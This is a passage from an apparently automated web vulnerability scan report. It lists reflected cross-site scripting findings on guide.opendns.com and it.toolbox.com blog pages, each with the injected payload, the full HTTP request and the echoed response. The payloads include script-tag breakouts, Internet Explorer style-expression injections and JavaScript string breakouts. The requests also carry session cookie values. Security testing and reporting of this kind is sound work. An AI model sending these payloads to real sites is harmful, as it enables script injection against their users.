Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Set-Cookie: OUS=deleted; expires=Sun, 29-Nov-2009 16:29:07 GMT; path=/; domain=.opendns.com
Connection: close
Date: Mon, 29 Nov 2010 16:29:08 GMT
Server: OpenDNS Guide

<html>
   <head>
       <title> </title>
       <script type="text/javascript">
       function bredir(d,u,r,v,c){var w,h,wd,hd,bi;var b=false;var p=false;var s=[[300,250,false],[250,250,false],[240,400,false],[336,2
...[SNIP]...
<body onLoad="window.location = bredir('advancedmags.com', 'advancedmags.com', '', 'error', '/main?url=advancedmags.com&servfail=&14981\"><script>alert(1)</script>3ec9547041e=1');" style="margin: 0px;">
...[SNIP]...

1.18. http://guide.opendns.com/ [servfail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /

Issue detail

The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c5"><script>alert(1)</script>1117a6984ef was submitted in the servfail parameter. This input was echoed as ef3c5\"><script>alert(1)</script>1117a6984ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?url=advancedmags%2Ecom&servfailef3c5"><script>alert(1)</script>1117a6984ef HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Set-Cookie: OUS=deleted; expires=Sun, 29-Nov-2009 16:29:06 GMT; path=/; domain=.opendns.com
Content-Length: 1397
Connection: close
Date: Mon, 29 Nov 2010 16:29:07 GMT
Server: OpenDNS Guide

<html>
   <head>
       <title> </title>
       <script type="text/javascript">
       function bredir(d,u,r,v,c){var w,h,wd,hd,bi;var b=false;var p=false;var s=[[300,250,false],[250,250,false],[240,400,false],[336,2
...[SNIP]...
<body onLoad="window.location = bredir('advancedmags.com', 'advancedmags.com', '', 'error', '/main?url=advancedmags.com&servfailef3c5\"><script>alert(1)</script>1117a6984ef=');" style="margin: 0px;">
...[SNIP]...

1.19. http://guide.opendns.com/ [servfail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /

Issue detail

The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa20"><script>alert(1)</script>f86a3d0a3b2 was submitted in the servfail parameter. This input was echoed as aaa20\"><script>alert(1)</script>f86a3d0a3b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?url=advancedmags%2Ecom&servfailaaa20"><script>alert(1)</script>f86a3d0a3b2 HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Set-Cookie: OUS=deleted; expires=Sun, 29-Nov-2009 16:29:06 GMT; path=/; domain=.opendns.com
Content-Length: 1397
Connection: close
Date: Mon, 29 Nov 2010 16:29:08 GMT
Server: OpenDNS Guide

<html>
   <head>
       <title> </title>
       <script type="text/javascript">
       function bredir(d,u,r,v,c){var w,h,wd,hd,bi;var b=false;var p=false;var s=[[300,250,false],[250,250,false],[240,400,false],[336,2
...[SNIP]...
<iframe frameborder="0" src="/main?url=advancedmags.com&servfailaaa20\"><script>alert(1)</script>f86a3d0a3b2=" width="100%" height="100%">
...[SNIP]...

1.20. http://guide.opendns.com/main [oq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /main

Issue detail

The value of the oq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e188"style%3d"x%3aexpression(alert(1))"49e9ed40a9e was submitted in the oq parameter. This input was echoed as 2e188"style="x:expression(alert(1))"49e9ed40a9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /main?q=AdvanceMags.com+conde+nast&d=www.advancemags.com&oq=Advance+Mags2e188"style%3d"x%3aexpression(alert(1))"49e9ed40a9e HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Referer: http://guide.opendns.com/main?url=www.advancemags.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|S4mCQ7OKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s78YTo8TT|8s78YTo8TT|8s78YTo8TT|M|8s78YTo8TT|8s78YTo8TT; LPSID=0276ca66-edb4-a8c4-f509-54c4560c438a

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: LPSID=a944f3f0-0f32-35b4-25a0-c882a6d7a22b; path=/; domain=opendns.com
Connection: close
Date: Mon, 29 Nov 2010 16:30:34 GMT
Server: OpenDNS Guide


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>OpenDNS</title>
   <link rel="stylesheet" href="htt
...[SNIP]...
<a href="/main?q=Condensate&oq=Advance Mags2e188"style="x:expression(alert(1))"49e9ed40a9e&qs=06oENya4ZGM2qStE2qUAoHNnzEZ-PmAf6GeTP4vJh2h8ANt-eZ7lLVPJiCUR51mvg-7ZTjgoLXjkmB-2dqRwJQSOtl4T5q4eoDTm_nq2NthD4rOrHmyWTZaC0LOADbOaMYu6H89bljX_fO4E-8K3aFydR9t6Mca61gUM1euScYWgxhp8k5XUPsFrwdH8BIpjYT_AW
...[SNIP]...

1.21. http://guide.opendns.com/main [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /main

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef6b1"style%3d"x%3aexpression(alert(1))"40d02cbd60b was submitted in the q parameter. This input was echoed as ef6b1"style="x:expression(alert(1))"40d02cbd60b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /main?q=AdvanceMags.com+conde+nastef6b1"style%3d"x%3aexpression(alert(1))"40d02cbd60b&d=www.advancemags.com&oq=Advance+Mags HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Referer: http://guide.opendns.com/main?url=www.advancemags.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|S4mCQ7OKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s78YTo8TT|8s78YTo8TT|8s78YTo8TT|M|8s78YTo8TT|8s78YTo8TT; LPSID=0276ca66-edb4-a8c4-f509-54c4560c438a

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: LPSID=287d9e9a-277f-f954-5d9c-69f6284d919b; path=/; domain=opendns.com
Connection: close
Date: Mon, 29 Nov 2010 16:30:28 GMT
Server: OpenDNS Guide


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>OpenDNS</title>
   <link rel="stylesheet" href="htt
...[SNIP]...
<a href="/main?q=AdvanceMags.com conde nastef6b1"style="x:expression(alert(1))"40d02cbd60b&oq=Advance Mags&qs=06oENya4ZGM2oSkQzaVAmnGbDgUWcJjw0p5qX-f-IT9LUsk-1RTcoDdbcpoXqX5IWpclNzw0I6D3mRJ-i5rgzM-KbMoFfLJ_1VFTjls8qOpyUiyMMKZ7Q7S0cD_gDKipwTb-EOprQFGfI5j7xyZnqVH-C0qrd85szGLqO0yxfa502I1H6-v3K
...[SNIP]...

1.22. http://guide.opendns.com/main [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /main

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895fb"style%3d"x%3aexpr/**/ession(alert(1))"61cea859924 was submitted in the url parameter. This input was echoed as 895fb"style="x:expr/**/ession(alert(1))"61cea859924 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /main?url=www.advancemags.com895fb"style%3d"x%3aexpr/**/ession(alert(1))"61cea859924 HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Referer: http://guide.opendns.com/?url=www%2Eadvancemags%2Ecom
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; LPSID=11170dde-3d22-6124-e50f-40ea9d526f73; fpc10002134856462=bmVcHWxK|S4mCQ7OKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s78YTo8TT|8s78YTo8TT|8s78YTo8TT|M|8s78YTo8TT|8s78YTo8TT

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: LPSID=81663bdb-28a2-4064-a13e-7df454e37cbf; path=/; domain=opendns.com
Connection: close
Date: Mon, 29 Nov 2010 16:29:54 GMT
Server: OpenDNS Guide


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>OpenDNS</title>
   <link rel="stylesheet" href="htt
...[SNIP]...
<a target="_top" href="http://www.advancemags.com895fb"style="x:expr/**/ession(alert(1))"61cea859924">
...[SNIP]...

1.23. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-soup

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ee39'-alert(1)-'29b91f41874 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/database-soup?7ee39'-alert(1)-'29b91f41874=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%267ee39'-alert(1)-'29b91f41874%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.24. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bab34'-alert(1)-'072c4aebae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/database-talk?bab34'-alert(1)-'072c4aebae=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26bab34'-alert(1)-'072c4aebae%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.25. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2luw

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 650b8'-alert(1)-'f4afc2e525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/db2luw?650b8'-alert(1)-'f4afc2e525=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62080


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%26650b8'-alert(1)-'f4afc2e525%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.26. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2zos

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f58e'-alert(1)-'2ae9d2c2651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/db2zos?6f58e'-alert(1)-'2ae9d2c2651=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%266f58e'-alert(1)-'2ae9d2c2651%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.27. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/elsua

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46c1'-alert(1)-'51ddbdc9083 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/elsua?a46c1'-alert(1)-'51ddbdc9083=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Nov 2010 17:06:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
er != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
